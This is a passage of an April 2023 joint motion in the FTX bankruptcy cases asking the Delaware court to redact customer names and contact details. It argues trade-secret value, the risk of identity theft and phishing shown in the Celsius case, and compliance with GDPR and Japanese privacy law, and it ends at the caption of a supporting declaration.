5.     Section 107(c) of the Bankruptcy Code expressly authorizes a Bankruptcy Court, for cause, to protect an individual's identifying information to the extent disclosure of that information would lead to identity theft or unlawful harm—which is exactly the situation here. The statute unambiguously provides that, notwithstanding the presumption of public access in bankruptcy cases, protecting personally identifiable information is paramount upon a showing of cause.  The cause for such protection here is patent and not hypothetical or speculative: as set forth in the accompanying declaration of Jeremy A. Sheridan (the "Sheridan Decl."), who served for 24 years as a Secret Service agent investigating financial and cryptocurrency-related crimes, the risk of a successful identity and asset theft scheme is significantly increased when malefactors have even basic information about their targets, such as their name and the fact that they were customers

---

[2]     *See In re Cred, Inc.*, No. 20-12836 (JTD) (Bankr. D. Del. Dec. 21, 2020) [D.I. 264] (order granting motion to seal individual customer names); *In re Celsius Network LLC*, No. 22-10964 (MG) (Bankr. S.D.N.Y. Sep. 28, 2022) [D.I. 910] (order denying motion to seal individual customer names; discussed *infra*); *In re Voyager Digital Holdings, Inc.*, No. 22-10943 (MEW) (Bankr. S.D.N.Y. July 08, 2022) [D.I. 54] (order granting motion to seal names of any natural persons subject to UK GDPR and EU GDPR regulations); *In re BlockFi, Inc.*, No. 22-19361 (MBK) (Bankr. D.N.J. Nov. 28, 2022) [D.I. 4] (motion to seal individual customer names; motion remains *sub judice*); *In re Genesis Global Holdco, LLC*, No. 23-10063 (SHL) (Bankr. S.D.N.Y. Mar. 17, 2023) [D.I. 137] (motion to seal individual customer names; motion remains *sub judice*).

of the FTX exchanges. (Sheridan Decl. ¶¶ 9, 10.)[3] These schemes and threats can take many different forms, as described by Mr. Sheridan, and myriad specific examples exist, including directed attacks on customers of Celsius that followed the disclosure of *only* the customers' names in that bankruptcy case. (*See* Sheridan Decl. ¶ 18.)

6. Plainly stated, the demonstrable risks to individual customers from disclosure of Individual Customer Names in these Bankruptcy Cases far outweigh the public's general interest in disclosing their names. Accordingly, the Court should order pursuant to section 107(c) that Individual Customer Names remain sealed and redacted on all pleadings and other public filings in these Chapter 11 Cases.

7. Finally, the Court should also authorize the redaction of names, along with the redaction of addresses and e-mail addresses already authorized, for all natural persons who are protected by the GDPR or the data privacy laws of Japan because of the risk of substantial penalties facing the Debtors in those jurisdictions for improper disclosure of personally identifiable information. The unique facts and circumstances of these Chapter 11 Cases establish that this Motion should be granted.

## **Background**

8. On November 11 and November 14, 2022 (as applicable, the "Petition Date"), the Debtors filed with the United States Bankruptcy Court for the District of Delaware (the "Court") voluntary petitions for relief under the Bankruptcy Code. The Debtors continue to operate their businesses and manage their properties as debtors-in-possession pursuant to sections 1107(a) and 1108 of the Bankruptcy Code. Joint administration of the Debtors' cases (the "Chapter

---

[3] The Sheridan Declaration is incorporated into this Motion as if set forth fully herein. The Movants expect that Mr. Sheridan, among other witnesses, will testify at the hearing seeking approval of this Motion.

11 Cases") was authorized by the Court by entry of an order on November 22, 2022 [D.I. 128]. On December 15, 2022, the Office of the United States Trustee for the District of Delaware (the "U.S. Trustee") appointed the Committee pursuant to section 1102 of the Bankruptcy Code [D.I. 231].

      9.     Additional factual background relating to the Debtors' businesses and the commencement of these Chapter 11 Cases is set forth in the *Declaration of John J. Ray III in Support of Chapter 11 Petitions and First Day Pleadings* [D.I. 24], the *Declaration of Edgar W. Mosley II in Support of Chapter 11 Petitions and First Day Pleadings* [D.I. 57], the *Supplemental Declaration of John J. Ray III in Support of First Day Pleadings* [D.I. 92] and the *Supplemental Declaration of Edgar W. Mosley II in Support of First Day Pleadings* [D.I. 93].

### **Facts Specific to the Relief Requested**

      10.     On November 19, 2022, the Debtors filed the *Motion of Debtors for Entry of Interim and Final Orders (I) Authorizing the Debtors to Maintain a Consolidated List of Creditors in Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals and (III) Granting Certain Related Relief* [D.I. 45] (the "Original Motion").[4]

      11.     On November 23, 2022, the Court granted the Original Motion on an interim basis and entered the *Interim Order (I) Authorizing the Debtors to Maintain a Consolidated List of Creditors in Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals on an Interim Basis and (III) Granting Certain Related Relief* [D.I. 157].

---

[4]     Capitalized terms not otherwise defined herein shall be given the meanings ascribed to them in the Original Motion.

12.     Objections to the Original Motion being granted on a final basis were interposed by the U.S. Trustee [D.I. 200, 362] and a group of media outlets [D.I. 195] (the "Media Intervenors").

13.     The Committee filed a joinder in support of the Debtors' Original Motion being granted on a final basis [D.I. 408].

14.     The Court held a hearing on the Original Motion on January 11, 2023 (the "Hearing").  At the Hearing, the Court granted the Original Motion on a final basis and, on January 20, 2023, entered the *Final Order (I) Authorizing the Debtors to Maintain a Consolidated List of Creditors in Lieu of Submitting a Separate Matrix for Each Debtor, (II) Authorizing the Debtors to Redact or Withhold Certain Confidential Information of Customers and Personal Information of Individuals on a Final Basis and (III) Granting Certain Related Relief* [D.I. 545] (the "Original Order").

15.     The Original Order authorized the Debtors, among other things, to redact from all public filings (a) addresses and e-mail addresses of their creditors and equity holders who are natural persons on a permanent basis; (b) names, addresses and e-mail addresses of their customers, including those customers who are not natural persons, until the "Redaction Deadline," which as defined therein, is set to expire on April 20, 2023;[5] and (c) names, addresses and e-mail addresses of any creditors or equity holders who are natural persons and who are protected by the GDPR, provided however that the authorization to redact names on this basis is only until the Redaction Deadline.  (Original Order ¶¶ 4-6.)

16.     The Original Order was entered with an express reservation of rights of the

---

[5]     Pursuant to Local Rule 9006-2, the filing of this Motion prior to the expiration of the Redaction Deadline shall automatically extend the Redaction Deadline until the Court acts on this Motion without the necessity for entry of a bridge order.

Debtors, the Committee and all other parties in interest to seek an extension of the Redaction Deadline, or to request authorization to redact any personal information of customers, creditors or equity holders on any other grounds. (*Id.* ¶ 7.)

17.     At the Hearing, the Court also indicated that it would welcome further briefing and/or evidence at a future hearing regarding (a) whether the Debtors should be authorized to redact names and other information of customers pursuant to section 107(c) of the Bankruptcy Code and (b) whether the Debtors should continue to be authorized to redact names of natural persons who are protected by the GDPR. (*See* Jan. 11, 2023 Hr'g Tr. 103:17-5-107:2.)

## Jurisdiction

18.     The Court has jurisdiction to consider this Motion pursuant to 28 U.S.C. §§ 157 and 1334 and the *Amended Standing Order of Reference* from the United States District Court for the District of Delaware, dated February 29, 2012. This matter is a core proceeding pursuant to 28 U.S.C. § 157(b). Venue is proper in the Court pursuant to 28 U.S.C. §§ 1408 and 1409. The statutory predicates for the relief requested herein are sections 105 and 107 of the Bankruptcy Code and Bankruptcy Rule 9018. Pursuant to Local Rule 9013-1(f), the Movants each consent to the entry of a final order or judgment by the Court in connection with this Motion to the extent it is later determined that the Court, absent consent of the parties, cannot enter final orders or judgments consistent with Article III of the United States Constitution.

## Relief Requested

19.     By this Motion, the Movants request entry of the Order, substantially in the form attached hereto as Exhibit A, authorizing each of the Movants to redact (a) the names, addresses and e-mail addresses of all of the Debtors' customers from any filings with the Court or made publicly available in these Chapter 11 Cases and (b) the names, addresses and e-mail addresses of any creditors or equity holders who are natural persons and who are protected by the

GDPR or Japan data privacy laws from any filings with the Court or made publicly available in these Chapter 11 Cases; *provided* that the Debtors and the Committee, as applicable, will provide the U.S. Trustee and counsel to the Committee or the Debtors, as applicable, as well as certain other governmental parties, copies of unredacted filings upon request and any other party copies of unredacted filings upon order of the Court.

### **Basis for Relief**

**A.      Cause Exists to Extend the Redaction Deadline for an Additional Three Months Pursuant to Section 107(b)(1) of the Bankruptcy Code.**

20.      Section 107(b)(1) of the Bankruptcy Code requires bankruptcy courts, at the request of a party-in-interest, to "protect an entity with respect to a trade secret or confidential research, development, or commercial information."  11 U.S.C. § 107(b)(1).  Pursuant to Bankruptcy Rule 9018, upon motion, "the court may make any order which justice requires . . . to protect the estate or any entity in respect of a trade secret or other confidential research, development, or commercial information."  Fed. R. Bankr. P. 9018.

21.      The Debtors argued in connection with the Original Motion that their customer list is a potentially significant source of value for their estates.  (Original Mot. ¶ 12.)  At the Hearing, Kevin Cofsky of Perella Weinberg Partners testified that as part of the Debtors' ongoing strategic review, his view is that there is value in the Debtors' customer lists, and that whether the exchanges are sold or reorganized, value is maximized by ensuring that competitors are not able to solicit customers and prematurely move them to other platforms.  (Jan. 11, 2023 Hr'g Tr. 25:4-26:15.)  Mr. Cofsky went on to testify that his view is that third parties will place significant value on the Debtors' customer lists in a sale process, and that maintaining the identity of the customers without disclosure will give buyers confidence that what they are buying is actually of value.  (*Id*. at 30:21-31:5.)  The same reasoning applies to a reorganized debtor entity,

**A0224**

which will retain more value if the Debtors' customers have not been poached and are not transacting on another exchange. (*Id.* at 31:6-11.)

22.     The Court agreed.  In granting the Original Motion on a final basis, the Court stated that "I think it goes without saying that a customer list in any bankruptcy case is something that is protected by 107(b) as a trade secret.  Companies hold those things very closely and don't want them disclosed." (*Id.* at 103:1-5.)  As Mr. Cofsky will testify in support of the requested relief, the Debtors require more time to maximize the value of these assets without premature, value destructive disclosure.  Indeed, as the Court heard at the April 13, 2023 omnibus hearing, the Debtors are only now at the point where they can begin, in earnest, to work with the Committee on the next steps to consider monetizing the exchanges, including commencing a marketing process with respect to the exchange assets, which will invariably include the customer lists. (*See* Apr. 13, 2023 Hr'g Tr. 17:12-18:11.)  The Debtors also now have clarity as to who is on their customer lists as compared to non-customer creditors, which ensures that only information for customers is redacted as authorized.  These distinctions, made in accordance with the terms of the Court's Original Order, are reflected on the Debtors' schedules of assets and liabilities and statements of financial affairs filed on March 14 and 15, 2023.

23.     Accordingly, the Movants request at this time a further extension of the Redaction Deadline with respect to all customer names, addresses and e-mail addresses for an additional three months from the date of entry of an order to preserve the value of the Debtors' customer lists.

**B.      Disclosure of Individual Customer Names Creates an Undue Risk of Identity Theft or Unlawful Injury that is Entitled to Protection Pursuant to Section 107(c) of the Bankruptcy Code.**

24.      Beyond the protections provided by section 107(b) of the Bankruptcy Code, section 107(c) provides this Court with an independent basis to authorize the filing of Individual Customer Names under seal.  Pursuant to section 107(c):

> (1)      The bankruptcy court, for cause, may protect an individual, with respect to the following types of information to the extent the court finds that disclosure of such information would create undue risk of identity theft or other unlawful injury to the individual or the individual's property:
>
> (A)      Any means of identification (as defined in section 1028(d) of title 18) contained in a paper filed, or to be filed, in a case under this title.
>
> (B)      Other information contained in a paper described in subparagraph (A).

11 U.S.C. § 107(c).  In turn, section 1028(d) of title 18 defines "means of identification" as:

> any name or number that may be used, alone or in conjunction with any other information, to identify a specific individual, including any—
>
> (A) name, social security number, date of birth, official State or government issued driver's license or identification number, alien registration number, government passport number, employer or taxpayer identification number;
>
> (B) unique biometric data, such as fingerprint, voice print, retina or iris image, or other unique physical representation;
>
> (C) unique electronic identification number, address, or routing code; or
>
> (D)  telecommunication identifying information or access device (as defined in section 1029(e))[.]

18 U.S.C. § 1028(d)(4).  As recognized by this Court at the Hearing: "if you look at 128(d) [sic], it says that the information includes *names*, numbers, or any combination of those two that would allow the identification of an individual. So, certainly, the Criminal Code recognizes that disclosure of a name could result in the identification of an individual and if that individual needs

protecting, we need to make sure that that is happening." (*See* Jan. 11, 2023 Hr'g Tr. at 103:24-104:5 (emphasis added).)

25.     Put simply, "[p]ursuant to § 107(c), a bankruptcy court 'may protect an individual with respect to [certain] types of information to the extent the court finds that disclosure . . . would create undue risk of identity theft or other unlawful injury to the individual or the individual's property.'" *In re Motions Seeking Access to 2019 Statements*, 585 B.R. 733, 750 (D. Del. 2018) (affirming on appeal bankruptcy court order sealing personally identifiable information of creditors).  The "types of information" that section 107(c) protects from disclosure, in turn, includes "any name or number that may be used, alone or in conjunction with other information to identify a specific individual." *Id.* (citing 18 U.S.C. § 1028(d)).  "Section 107(c) references 'risk,' and assessment of risk is forward looking.  While a specific *potential* harm must be identified, the standard does not require evidence of injury having occurred in the past or under similar circumstances." *Id.* at 751 (emphasis added; internal citations omitted).

26.     Although the U.S. Trustee and the Media Intervenors in previous filings both minimized the potential risks from disclosure of only a customer's name, the evidence is to the contrary.  As set forth more fully in the Sheridan Declaration and as will be demonstrated at the hearing on this Motion, there is specific potential risk of identity theft or unlawful injury to the Debtors' customers if Individual Customers Names are disclosed.  Malefactors are skilled at using publicly available sources to compile a dossier on a potential victim; disclosure of a customer's name provides a specific foundation for criminal activity by providing the starting point by which a malefactor can gather information on its targets.  For instance, a criminal actor can easily take a customer's name and correlate additional information about that customer from public databases, including telephone numbers, home addresses, e-mail addresses, places of employment, social

media presence and associates, in order to create a customer "dossier."  (Sheridan Decl. ¶ 9.)
Simply being able to tie a name to a certain trait—such as an individual who holds and invests in
cryptocurrency—can significantly increase the likelihood that a malefactor may locate an
individual's online presence and information, and thus provide the malefactor the opportunity to
implement a criminal act, whether through online means or, even more disturbing, physical threats
and attacks, upon an unsuspecting customer.  (*See* Sheridan Decl. ¶ 9; Jamie Redman, *London
College Student Robbed at Knifepoint by 8 Thugs for $93K in Bitcoin*, Bitcoin.com (Sept. 25,
2021) (Sheridan Decl. Ex. M); Francisco Memoria, *Victim of Brazilian Bitcoin Ransom
Kidnapping Plot Rescued*, CCN (Mar. 4, 2021) (Sheridan Decl. Ex. L).)

      27.     The risks to the Debtors' customers from disclosure of their identities are
not conjecture, hypothetical or exaggerated.  For example, in the pending cryptocurrency
bankruptcy cases of *In re Celsius Network LLC* ("Celsius"), the bankruptcy court held that
individual customers' physical and e-mail addresses should be sealed under section 107(c),[6] but
required that names of such individual customers be disclosed because the court was
"unconvinced, beyond speculation, that the disclosure of names alone (without e-mail or physical
addresses) presents an imminent risk of harm."  *In re Celsius Network LLC*, 644 B.R. at 295.
Thereafter, searchable customer lists were created and posted online from the approximately
14,000 pages of customer information that was made public—a small fraction of the size of the
Debtors' customer lists here—which allowed anyone with internet access to search Celsius
customers based upon their cryptocurrency holdings.  *See* Mack DeGeurin, *New Tool Shows the
Biggest Losers in the Celsius Crypto Meltdown*, Gizmodo (Oct. 10, 2022),

---

[6]    "Such information, in combination with their names, could make individual account holders more vulnerable to
identity theft and render account holders' crypto assets more susceptible to criminal theft."  *In re Celsius Network
LLC*, 644 B.R. 276, 294 (Bankr. S.D.N.Y. 2022).

https://gizmodo.com/crypto-celsius-1849637951.  Various criminal attempts were then made to influence and steal from Celsius customers, including multiple phishing attempts.  *Notices of Phishing Attempts, In re Celsius Network LLC*, No. 22-10964 (MG) (Bankr. S.D.N.Y.) [D.I.s 1527, 1681, 1904, 1992, 2082].  Although some phishing attempts were amateurish and easily detectable, others were more sophisticated and appeared to customers to be legitimate contact from the debtors and their professionals.  Indeed, the *Celsius* bankruptcy court involved the U.S. Marshal when a malefactor criminally modified and emailed to Celsius customers a court order that purported to require Celsius customers to submit personal information, including their cryptocurrency wallet address and contact information, and to pay a "filing fee" and "tax fee."  *Notice of Phishing Attempts*, *In re Celsius Network LLC*, No. 22-10964 (MG) (Bankr. S.D.N.Y.) [D.I. 1904].[7]

28.    The Debtors and the Committee are of course cognizant that there is a presumptive right of access to documents filed in a federal court.  *In re Altegrity, Inc.*, 2015 WL 10963572, at *3 (Bankr. D. Del. July 6, 2015) (citing *In re Orion Pictures Corp.*, 21 F.3d 24, 26 (2d Cir. 1994)).  Nevertheless, "the public's right of access to judicial records is not absolute," and Congress has specifically authorized courts to protect "any means of identification."  *In re A C & S Inc.*, 775 F. App'x 78, 79 (3d Cir. 2019).  In other words, "[t]he court may protect private information in a judicial record upon an appropriate showing that the privacy interests outweigh the presumption of public access to the information."  *In re Endo Int'l plc*, 2022 WL 16640880, at *11 (Bankr. S.D.N.Y. Nov. 2, 2022).

---

[7]    The court's decision in *Celsius*, the Movants respectfully submit, was incorrect as a matter of law, is distinguishable as a matter of fact as being based upon what the court there found to be an insufficient evidentiary record, and, in any event, is not binding upon this Court.  Most importantly, the disclosure of customer names in Celsius has since resulted in the exact injury that the court there believed was speculative when initially raised.

29.     As Judge Owens held in *In re Clover Techs. Grp., LLC*,: "[t]o me it is common sense.  I don't need evidence that there is, at best, a risk of identity theft and worse a risk of personal injury from listing someone's name and address on the internet by way of the court's electronic case filing system and, of course, the claims agent's website." *In re Clover Techs. Grp., LLC,* No. 19-12680 (KBO) (Bankr. D. Del. Jan. 24, 2020), Jan. 22, 2020 Hr'g Tr. [D.I. 146] at 24:21–25; *see also In re Anna Holdings*, No. 19-12551 (CSS) (Bankr. D. Del. Dec. 3, 2019), Dec. 4, 2019 Hr'g Tr. [D.I. 112] at 48:20–22, 49:3–5 ("[I]t's just plain common sense in 2019—soon-to-be 2020—to put as little  information out as possible about people's personal lives to present [sic] scams. . . . [Identity theft is] a real-life issue[.]").

30.     Here, privacy interests—the safety and protection of customers—far outweigh the presumption of public access in these Chapter 11 Cases.  Indeed, as the evidence will show, the Debtors' customers present a particularly compelling target to potential wrongdoers, as "malefactors typically target (x) consumers they believe to be holders of cryptocurrency and (y) consumers who are in a vulnerable state, including because they have sums of money tied up in bankruptcy proceedings." (Sheridan Decl. ¶ 8.)  The Debtors' individual customers fulfill both of these criteria and thus disclosure of their names should be protected by section 107(c).

31.     Moreover, none of the reasons previously offered in opposition to the relief requested by the Movants here provide any basis to deny the sealing of Individual Customer Names.  First, cryptocurrency investors, generally, often anonymously communicate among themselves through social media and similar channels, thereby reducing the need for a public customer list to facilitate conferral among creditors.

32.     Second, the opinions of Mr. Sheridan, based upon his more than two decades in law enforcement investigating financial crimes, including cryptocurrency schemes,

refute any contention that public access to the Individual Customer Names would not create an undue risk of identity theft.  Indeed, the experience following the release of customer names in the *Celsius* bankruptcy cases, in which the severity of the criminal actions required the bankruptcy court to notify the U.S. Marshal, belies any notion that a phishing attack is just par for the course.

33.     Finally, should this Motion be granted and Individual Customer Names be sealed, to the extent any party-in-interest has grounds to seek disclosure of specific customer names for a specific purpose—such as to "scrutinize" claims trades disclosed on the dockets of these Chapter 11 Cases—they will of course be able to do so, without jeopardizing every other individual customer of these estates.  And, transparency will be served because parties-in-interest, including the Committee and the U.S. Trustee, among others, can view the sealed information subject to appropriate confidentiality restrictions and protections, thereby providing the check on the Debtors that public disclosure is meant to provide.

34.     In sum, in the circumstances of these Chapter 11 Cases, the customer's privacy rights must take precedence over the public's general right of access to creditor information.  No compelling reason exists to require disclosure of the Individual Customer Names given the very real risks that individual customers face if their names are disclosed.  The relief sought pursuant to section 107(c) should be granted.

**C.     The Court Should Authorize the Movants to Redact Names and Information of Natural Persons Protected by the GDPR and Japan data privacy law.**

35.     The Court should also permit the Debtors, pursuant to section 105 of the Bankruptcy Code, to comply with the GDPR and Japan data privacy laws to prevent harm to estates that could arise from violations of those laws in the local jurisdictions.

i.   The GDPR Applies to the Debtors

36.   The Movants submit that the Court should authorize the Debtors to redact personal information of all natural persons who are protected by the GDPR.  The GDPR imposes significant constraints on processing "any information related to an identified or identifiable natural person" ("Personal Data").  EU GDPR Art. 4(1); UK GDPR Art. 3(2) ("any information relating to an identified or identifiable living individual").  The GDPR applies to (a) the processing of Personal Data in the context of an establishment of a controller or processor in the United Kingdom ("UK") or European Economic Area ("EEA"), regardless of whether the processing takes place in the UK or EEA and (b) the processing of Personal Data by a controller or processor not established in the UK or EEA but where processing activities are related to (i) the offering of goods or services, irrespective of whether a payment of the data subject is required, or (ii) the monitoring of data subjects' behavior as far as such behavior takes place within the UK or EEA.  EU GDPR Arts. 3(1), (2); UK GDPR Arts. 207(2), (3).  The Debtors are thus subject to the GDPR pursuant to the plain language of the regulation because they are either controllers in the UK or EEA or collected Personal Data of data subjects in the UK and EEA when offering goods and services.

37.   "Processing" is defined in the GDPR as "any operation or set of operations which is performed on personal data or on sets of personal data, whether or not by automated means, such as," among other things, "disclosure by transmission [and] dissemination or otherwise making available."  EU GDPR Art. 4(2); UK GDPR Art. 4(d).  Including the names of natural persons protected by the GDPR in public court filings constitutes the "processing" of Personal Data under the GDPR.

38.     Pursuant to Article 6 of the EU GDPR and Schedule of the UK GDPR, the

Debtors must therefore have a legal basis to process the Personal Data of UK or EEA data subjects.

EU GDPR Art. 6(1); *see also* UK GDPR Schedule 9.  There are six possible bases for processing:

    i.    the data subject has given consent to the processing of his or her personal data for one or more specific purposes;

    ii.    processing is necessary for the performance of a contract to which the data subject is party or in order to take steps at the request of the data subject prior to entering into a contract;

    iii.    processing is necessary for compliance with a legal obligation to which the controller is subject;

    iv.    processing is necessary in order to protect the vital interests of the data subject or of another natural person;

    v.    processing is necessary for the performance of a task carried out in the public interest or in the exercise of official authority vested in the controller; and

    vi.    processing is necessary for the purposes of the legitimate interests pursued by the controller or by a third party, except where such interests are overridden by the interests or fundamental rights and freedoms of the data subject which require protection of personal data, in particular where the data subject is a child.

None of these bases facially apply to the Debtors.  The UK and EEA data subjects on whom the

Debtors have Personal Data have not consented to the processing of their data for the specific

purpose of the Chapter 11 Cases.  Neither is the disclosure of their information necessary for the

performance of a contract to which they are a party or to protect the vital interests of the data

subjects or other natural persons.  Likewise, the processing is not necessary for compliance with a

legal obligation to which the controller is subject because the GDPR provides that any such legal

obligation "*should have a basis in Union or Member state law*"—not U.S. law.  EU GDPR Art.

6(1), Recital 45 (emphasis added); UK GDPR Schedule 6 ¶ 3(3); *see also* EU GDPR Art. 6(3)

(providing that the legal obligation "shall be laid down by" either European Union law or Member State law to which the controller is subject). Nor are the Chapter 11 Cases "a task carried out in the public interest or in the exercise of official authority vested in the controller," which public interest also must be "laid down by" either European Union law or Member state law (in the EU GDPR) or domestic law (in the UK GDPR). *See* EU GDPR Art. 6(3); UK GDPR Schedule 6(3).

39.     Evaluation of the "legitimate interests" of the Debtors to process Personal Data under the GDPR would be a fact intensive inquiry that data protection authorities would perform *after* action was taken. Thus, if the Debtors were to process Personal Data, they likely would be subject to an enforcement action in which they would need to demonstrate a legal basis for such processing: first, that the Debtors had a legitimate interest, second that such processing was necessary for the purposes of such legitimate interest, and finally, it would then be evaluated whether such legitimate interest was overridden by "the interests or the fundamental rights and freedoms of the data subject" on the specific facts presented. *See* EU GDPR Art. 6; *see also* UK GDPR Schedule 9. The Movants believe that the risks posed by taking action and then being potentially subject to an adverse outcome in an enforcement action is too great under the circumstances.

ii.     <u>Failure to Comply with the GDPR Exposes the Debtors' Estates to Risk of Substantial Financial Harm</u>

40.     Violators of the GDPR risk severe statutory penalties. For a breach of the EU GDPR, the organization may be fined up to the higher of €20 million or 4% of worldwide annual turnover of the preceding financial year. *See* EU GDPR Art. 83(5). For a breach of the UK GDPR, the organization may be fined up to the higher of £17.5 million or 4% of annual worldwide turnover in the preceding financial year. See UK GDPR Art. 157(5)(a).

41.     These penalties are not merely speculative; large fines have been levied against entities for violations of the GDPR in recent years.  In 2021, for example, the largest fine for violating the GDPR was €746 million against an Amazon entity in Luxembourg for "non-compliance with general data processing principles."  *See Number & Figures*, CMS, https://cms.law/en/deu/publication/gdpr-enforcement-tracker-report/numbers-and-figures#.  The largest fine specifically for "insufficient legal basis for data processing" was against a Google entity in France for €90 million.  *Id.*  In January 2023, an Irish Meta entity was fined €390 million for non-compliance with general data processing principles.  *See* Ryan Browne, *Meta fined more than $400 million in Ireland over EU privacy breaches*, CNBC (Jan. 4, 2023 10:54 AM), cnbc.com/2023/01/04/meta-fined-more-than-400-million-in-ireland-over-eu-privacy-breaches.html.

42.     The Movants believe the risk is high for significant monetary penalties if the Debtors are found to have violated the GDPR by the applicable enforcement jurisdiction.  The GDPR provides that, when determining whether to impose an administrative fine and deciding on the amount of such fine in each case, due regard shall be given to "the nature, gravity and duration of the infringement taking into account the nature[,] scope or purpose of the processing concerned as well as the number of data subjects affected and the level of damage suffered by them."  EU GDPR Art. 83(2); *see also* UK GDPR Arts. 155(2), 155(3) (determination of penalty depends in part on "the nature, gravity and duration of the failure").  As evidenced by the Media Intervenors' objection to the Original Motion, there is substantial publicity of these Chapter 11 Cases and desire to report on the identities of the Debtors' customers.  The public dissemination of these identities would likely be considered when determining any fine or penalty.

      iii.  <u>Japan Data Privacy Laws Impose Requirements on the Debtors and Expose the Debtors to Potential Penalties</u>

43.    The Movants are also requesting authority to redact certain information of individuals under data privacy law of Japan:  the Act on the Protection of Personal Information ("<u>APPI</u>").  Under the APPI, a business operator handling personal information—like certain of the Debtors—is prohibited from disclosing such information without the consent of the individual or unless certain statutory exceptions apply.  APPI Arts. 27(1), 28(1).  "Personal information" includes an individual's name.  APPI Art. 2(1)(i).  While there is a statutory exception for disclosure if it is required by law, this exception does not apply where the applicable law is foreign law (such as U.S. law).  APPI Art. 27(1)(i).  Critically, violations of the APPI could also result in business suspension or the revocation of a business license under the Financial Instruments and Exchange Act of Japan ("<u>FIEA</u>").  FIEA Arts. 51, 52(1).  The business license in Japan is a crucial asset of the Debtors' estates in their ongoing reorganization and sale efforts.  It is therefore paramount that the Debtors be permitted to comply with the APPI in order to protect this asset and those customers in Japan.

      iv.  <u>The Court Should Authorize the Debtors to Comply with the GDPR and Japan Data Privacy Law</u>

44.    The Movants are not seeking a determination that the GDPR or APPI supersedes U.S. bankruptcy law because that is not necessary for the requested relief to be granted. Indeed, even if the Movants were to argue—and the Court were to find—that U.S. bankruptcy law controls, the Movants do not know if any such order or the automatic stay would prevent the levying of financial or other penalties in the relevant foreign jurisdiction.

45.    Rather, the Debtors maintain that they are subject to these laws by their plain terms, and that they believe enforcement of the public disclosure requirements of U.S.

bankruptcy law would expose them to undue risk of serious financial harm, to the detriment of all creditors and other stakeholders. Authorizing the Debtors to comply with applicable non-bankruptcy law has a basis in both the Bankruptcy Code and principles of comity.

46.     For example, section 959(b) of the Bankruptcy Code provides that trustees and debtors-in-possession must "manage and operate the property in his possession . . . according to the requirements of the valid laws of the State in which such property is situated." 28 U.S.C. § 959(b). In addition, principles of comity militate in favor of authorizing the Debtors to redact information in order to comply with applicable foreign law, particularly where there is a risk of significant adverse judgments being imposed.

47.     Here, individuals protected by the GDPR and Japan data privacy law, which all came into effect before these Chapter 11 Cases were commenced, have a reasonable expectation that their personal information will not be disclosed in violation thereof. The Debtors recognize U.S. bankruptcy law requires certain disclosures, and the Debtors have been seeking to balance the competing considerations. The Debtors further submit that, to the extent the Committee obtains information covered by the GDPR, the Committee should likewise be authorized to redact such information from publicly filed papers in these Chapter 11 Cases in order to protect the Debtors from these potential harms. The proposed Order provides an appropriate balance because the Movants would file information under seal but provide it to the Court, the U.S. Trustee and the Committee or the Debtors, as applicable. This ensures appropriate access to the information without subjecting the Debtors to substantial risk of financial or other penalties. The Order also provides that parties can at any time seek relief from the Court to obtain access to the redacted information. As a result, the Movants do not believe that the requested relief is prejudicial to any interested parties.

## Notice

48.     Notice of this Motion has been provided to: (a) the U.S. Trustee; (b) counsel to the Committee; (c) the Securities and Exchange Commission; (d) the Internal Revenue Service; (e) the United States Department of Justice; (f) the United States Attorney for the District of Delaware; and (g) to the extent not listed herein, those parties requesting notice pursuant to Bankruptcy Rule 2002.  The Debtors submit that, in light of the nature of the relief requested, no other or further notice need be provided.

## Conclusion

WHEREFORE, for the reasons set forth herein, the Movants respectfully request that the Court (a) enter the Order, substantially in the form attached hereto as Exhibit A, and (b) grant such other and further relief as is just and proper.

Dated: April 20, 2023
Wilmington, Delaware

**LANDIS RATH & COBB LLP**

*/s/ Matthew R. Pierce*
Adam G. Landis (No. 3407)
Kimberly A. Brown (No. 5138)
Matthew R. Pierce (No. 5946)
919 Market Street, Suite 1800
Wilmington, Delaware 19801
Telephone: (302) 467-4400
Facsimile: (302) 467-4450
E-mail: landis@lrclaw.com
      brown@lrclaw.com
      pierce@lrclaw.com

-and-

**SULLIVAN & CROMWELL LLP**
Andrew G. Dietderich (admitted *pro hac vice*)
James L. Bromley (admitted *pro hac vice*)
Brian D. Glueckstein (admitted *pro hac vice*)
Alexa J. Kranzley (admitted *pro hac vice*)
125 Broad Street
New York, NY 10004
Telephone: (212) 558-4000
Facsimile: (212) 558-3588
E-mail: dietdericha@sullcrom.com
      bromleyj@sullcrom.com
      gluecksteinb@sullcrom.com
      kranzleya@sullcrom.com

*Counsel for the Debtors and Debtors-in-Possession*

**A0239**

Dated: April 20, 2023
      Wilmington, Delaware

**YOUNG CONAWAY STARGATT & TAYLOR, LLP**

*/s/ Robert F. Poppiti*

Matthew B. Lunn (No. 4119)
Robert F. Poppiti, Jr. (No. 5052)
1000 North King Street
Wilmington, DE 19801
Telephone: (302) 571-6600
Facsimile: (302) 571-1253
Email: mlunn@ycst.com
      rpoppiti@ycst.com

-and-

**PAUL HASTINGS LLP**

Kristopher M. Hansen*
Kenneth Pasquale*
Gabriel E. Sasson*
Isaac S. Sasson*
Caroline Diaz*
200 Park Avenue
New York, NY 10166
Telephone: (212) 318-6000
Facsimile: (212) 319-4090
Email: krishansen@paulhastings.com
      kenpasquale@paulhastings.com
      gabesasson@paulhastings.com
      isaacsasson@paulhastings.com
      carolinediaz@paulhastings.com

*Admitted pro hac vice*

*Counsel to the Official Committee of Unsecured Creditors*

# IN THE UNITED STATES BANKRUPTCY COURT
## DISTRICT OF DELAWARE

|  |  |
|---|---|
| In re: | Chapter 11 |
| FTX TRADING LTD., *et al.*,[1] | Case No. 22-11068 (JTD) |
| Debtors. | (Jointly Administered) |

## DECLARATION OF JEREMY A. SHERIDAN IN SUPPORT OF THE JOINT MOTION OF THE DEBTORS AND THE OFFICIAL COMMITTEE OF UNSECURED CREDITORS FOR AN ORDER AUTHORIZING MOVANTS TO REDACT OR WITHHOLD CERTAIN CONFIDENTIAL INFORMATION OF CUSTOMERS <u>AND PERSONAL INFORMATION OF INDIVIDUALS</u>

I, Jeremy A. Sheridan, declare pursuant to 28 U.S.C. § 1746 as follows:

